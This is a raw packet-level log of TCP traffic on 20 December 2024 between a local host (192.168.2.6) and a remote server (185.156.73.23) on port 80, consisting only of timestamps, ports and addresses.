Dec 20, 2024 16:33:09.796627045 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.796749115 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.796791077 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.797454119 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.797498941 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.797900915 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.798167944 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.798216105 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.799000978 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.799053907 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.799086094 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.799348116 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.800136089 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.800185919 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.800281048 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.801145077 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.801215887 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.801258087 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.802267075 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.802278996 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.802318096 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.802359104 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.803128004 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.803173065 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.803488970 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.803755045 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.803977013 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.804053068 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.804095984 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.805028915 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.805083990 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.805326939 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.805577040 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.806245089 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.806304932 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.806433916 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.806478977 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.807272911 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.807337999 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.807358980 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.807421923 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.808320045 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.808497906 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.808531046 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.808581114 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.809413910 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.809530973 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.809551954 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.809598923 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.810631990 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.810800076 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.810812950 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.810858965 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.811575890 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.811762094 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.812136889 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.812190056 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.812868118 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.812920094 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.812969923 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.813025951 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.813801050 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.813847065 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.813919067 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.813957930 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.815023899 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.815068960 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.815180063 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.815222025 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.816061974 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.816109896 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.816210032 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.816251040 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.817194939 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.817241907 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.817385912 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.817425966 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.818203926 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.818274021 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.818315983 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.819283962 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.819334030 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.819354057 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.819401026 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.820480108 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.820669889 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.820801973 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.820996046 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.821523905 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.821573973 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.821624994 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.821744919 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.822535992 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.822587013 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.822685003 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.822829008 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.823698044 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.823837042 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.823868990 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.823868990 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.824745893 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.824810028 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.824877977 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.824949980 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.825948954 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.826051950 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.826078892 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.826121092 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.826992035 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.827039003 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.827405930 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.827466965 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.828016996 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.828057051 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.963268995 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.963331938 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.963515043 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.963551998 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.963757038 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.963864088 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.964220047 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.964262962 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.964879990 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.964929104 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.964992046 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.965027094 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.965950966 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.966006041 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.966162920 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.966312885 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.967056990 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.967097044 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.967246056 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.967282057 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.968135118 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.968194962 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.968317032 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.968494892 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.969224930 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.969279051 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.969516993 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.969593048 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.970347881 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.970503092 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.970525026 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.970541000 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.971472025 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.971574068 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.971784115 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.971868992 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.972496033 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.972618103 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.972654104 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.973634958 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.973794937 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.973824978 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.973824978 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.974706888 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.974752903 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.974900961 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.974960089 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.975840092 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.975883961 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.976018906 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.976054907 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.977025986 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.977075100 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.977149963 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.977284908 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.978003979 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.978041887 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.978148937 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.978182077 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.979227066 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.979265928 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.979777098 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.979816914 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.980673075 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.980798006 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.980815887 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.980835915 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.981898069 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.981935024 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.982068062 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.982115030 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.983031034 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.983108044 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.983309984 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.983350039 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.984160900 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.984215021 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.984388113 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.984425068 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.985115051 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.985161066 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.985409975 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.985476971 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.986035109 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.986047029 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.986073971 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.986088991 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.986737967 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.987042904 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.987159967 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.987200022 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.987834930 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.987919092 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.987957001 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.988950968 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.989090919 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.989213943 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.989253998 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.990046024 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.990089893 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.990258932 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.990324974 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.991125107 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.991170883 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.991197109 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.991455078 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.992208958 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.992252111 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.992314100 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.992348909 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.993330002 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.993853092 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.993894100 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.994429111 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.994472027 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.994679928 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.994719982 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.995515108 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.995604038 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.995625973 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.995682955 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.996597052 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.996634960 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.996695995 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.996736050 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.997710943 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.997869015 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.997927904 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.997965097 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.998802900 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.998838902 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.999033928 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.999120951 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.999934912 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.000087023 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.000118017 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.000118017 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.000986099 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.001147985 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.001207113 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.001245975 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.002131939 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.002144098 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.002191067 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.002211094 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.003154993 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.003325939 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.003473997 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.003509998 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.004328966 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.004369974 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.004458904 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.004651070 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.005414009 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.005460978 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.005501032 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.005534887 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.006468058 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.006508112 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.006836891 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.007571936 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.007607937 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.007971048 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.008008003 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.008651018 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.008949995 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.008989096 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.009773016 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.009812117 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.010011911 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.010062933 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.010945082 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.011013031 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.011636019 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.011677980 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.011953115 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.011986971 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.012655020 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.012692928 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.013046980 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.013060093 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.013093948 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.014137983 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.014185905 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.014211893 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.014261961 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.015326977 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.015367985 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.015393972 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.015444994 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.016369104 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.016551018 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.016590118 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.017429113 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.017472029 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.017666101 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.017745018 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.018634081 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.018673897 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.018949986 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.018989086 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.019635916 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.019673109 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.019934893 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.019975901 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.020684958 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.020942926 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.155303001 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.155540943 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.155944109 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.155958891 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.155985117 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.156008959 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.156070948 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.156109095 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.156958103 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.157023907 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.157119989 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.157157898 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.157943010 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.157998085 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.158303022 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.158351898 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.159050941 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:10.159094095 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:10.159471989 CET	80	49881	185.156.73.23	192.168.2.6
